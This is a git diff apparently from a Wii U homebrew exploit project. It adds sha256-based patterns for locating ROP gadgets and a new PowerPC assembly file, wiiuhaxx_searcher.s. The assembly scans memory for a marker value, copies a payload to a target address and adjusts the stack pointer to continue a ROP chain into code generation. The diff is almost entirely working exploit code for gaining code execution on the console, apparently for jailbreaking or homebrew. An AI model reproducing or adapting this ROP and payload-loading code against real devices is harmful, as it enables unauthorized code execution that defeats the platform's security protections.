--patterntype=sha256 --patterndata=c87020ec5098d13edd3ee0d0d01313a0a5f0a7937f36c0f5f4e9503165ae33fb --patternsha256size=0x10 --addval=0xFFFFFCFC "--plainout=$ROP_POPJUMPLR_STACK12 = "
|
||||
--patterntype=sha256 --patterndata=decff3ca875efc1a9c3d0ac7618f3efa3d33ca59bd3fd602a747d3469bd5c000 --patternsha256size=0x10 --addval=0xFFFFFCFC "--plainout=$ROP_POPJUMPLR_STACK20 = "
|
||||
--patterntype=sha256 --patterndata=5306248821c072a9cf5c71c9469171e17cd2966f66fc7d612ce79cff8d5d124a --patternsha256size=0x34 --addval=0xFFFFFCFC "--plainout=$ROP_CALLFUNC = "
|
||||
--patterntype=sha256 --patterndata=f4e76053a65c571f2b3b8c6c6dde973c95f889bccf0a22eb9649cbc7810c8e98 --patternsha256size=0x2c --addval=0xFFFFFCFC "--plainout=$ROP_CALLR28_POP_R28_TO_R31 = "
|
||||
--patterntype=sha256 --patterndata=4741b863adcf742f8928c485a39f3cc8629469d1ddccf9e68c9dd1c25341f091 --patternsha256size=0x20 --addval=0xFFFFFCFC "--plainout=$ROP_POP_R28R29R30R31 = "
|
||||
--patterntype=sha256 --patterndata=972973be8074e92b0f10fc5fbbaaef6c28e2905f99007654cd735a5fd69933fc --patternsha256size=0x14 --addval=0xFFFFFCFC "--plainout=$ROP_POP_R27 = "
|
||||
--patterntype=sha256 --patterndata=6f5f11fdc441ddef8f2189cbc9006517c4917fcf6e975cb8cbeb2373bf8e8ca2 --patternsha256size=0x14 --addval=0xFFFFFCFC "--plainout=$ROP_POP_R24_TO_R31 = "
|
||||
--patterntype=sha256 --patterndata=e602f66cf8aadc4d5e7db074ad9b8fbfa4190f862a8215cf26f707a49ca95070 --patternsha256size=0x28 --addval=0xFFFFFCFC "--plainout=$ROP_CALLFUNCPTR_WITHARGS_FROM_R3MEM = "
|
||||
--patterntype=sha256 --patterndata=5e1fb4810ff6fb86bb533f2050306de6e03e09450887df6cb22c6d8511c3e267 --patternsha256size=0x18 --addval=0xFFFFFCFC "--plainout=$ROP_SETR3TOR31_POP_R31 = "
|
60
wiiuhaxx_searcher.s
Normal file
60
wiiuhaxx_searcher.s
Normal file
|
@ -0,0 +1,60 @@
|
|||
# Do not remove this.
|
||||
bl l0
|
||||
l0:
|
||||
|
||||
# Get the start search address (from r28) and save it in r4
|
||||
mr 4, 28 # Move r28(=start search address) into r4
|
||||
|
||||
# Get the target address (from r29) and save it in r3
|
||||
mr 3, 29 # Move r29(=target address into r3
|
||||
|
||||
#r3 = target adress
|
||||
#r4 = search address
|
||||
|
||||
# Get the search for (to be precise the value-4) value (from r27) and save it in r6
|
||||
mr 6, 27 # Move r27(=search for) into r6
|
||||
addi 6,6, 4 # Add 4 to it, to get the real target value.
|
||||
|
||||
# Find search value
|
||||
skipnop: #
|
||||
lwz 5, 0(4) # load from r4 into r5
|
||||
addi 4,4,4 # increment r4 by 4
|
||||
cmp 0,0, 5,6 ; # check if it matches our search value
|
||||
bne 0,skipnop # if not, repeat.
|
||||
|
||||
# On failure we crash, on success the start address of the payload is in r4
|
||||
|
||||
#r3 = target adress
|
||||
#r4 = startaddress of payload
|
||||
|
||||
# load "sizeToCopy" from r26 into r5, thats the size we want to copy.
|
||||
mr 5, 26 # sizeToCopy
|
||||
|
||||
#r3 = target adress
|
||||
#r4 = startaddress of payload
|
||||
#r5 = size to copy
|
||||
|
||||
# Calculate the numbers of words to copy and save it in the counter register (payload_size>>2).
|
||||
li 6, 2 # load 2 into r6
|
||||
srw 5, 5, 6 # Shift Right Word. Shift r5 by r6 (2). To get the number of words (4 bytes each) to copy.
|
||||
mtctr 5 # ctr reg = above u32 value >> 2. Put it into counter register.
|
||||
|
||||
#r3 = target adress
|
||||
#r4 = startaddress of payload
|
||||
#ctr words to copy
|
||||
|
||||
# Copy ctr words starting from r4 to r3.
|
||||
copylp: # Copy the data from _end+4 with size *_end, to the address from r29 (which is now in r3).
|
||||
lwz 5, 0(4) # load from r4
|
||||
stw 5, 0(3) # write to r3 from r5
|
||||
addi 4,4,4
|
||||
addi 3,3,4 # increment both addresses
|
||||
bdnz copylp #Decrement count register and branch if it becomes nonzero
|
||||
|
||||
# Continue our ROP to now copy the memory from "target address" to codegen.
|
||||
add 1, 1, 30 # Jump to the code-loading ROP to load the codebin which was copied above. (add r30(=8) to r1(the stackpointer)
|
||||
lwz 3, 4(1) #read load adress from r1 with offset 4 into r3
|
||||
mtctr 3 # move r3 to count register
|
||||
bctr # continue the rop.
|
||||
|
||||
_end:
|
Loading…
Reference in New Issue
Block a user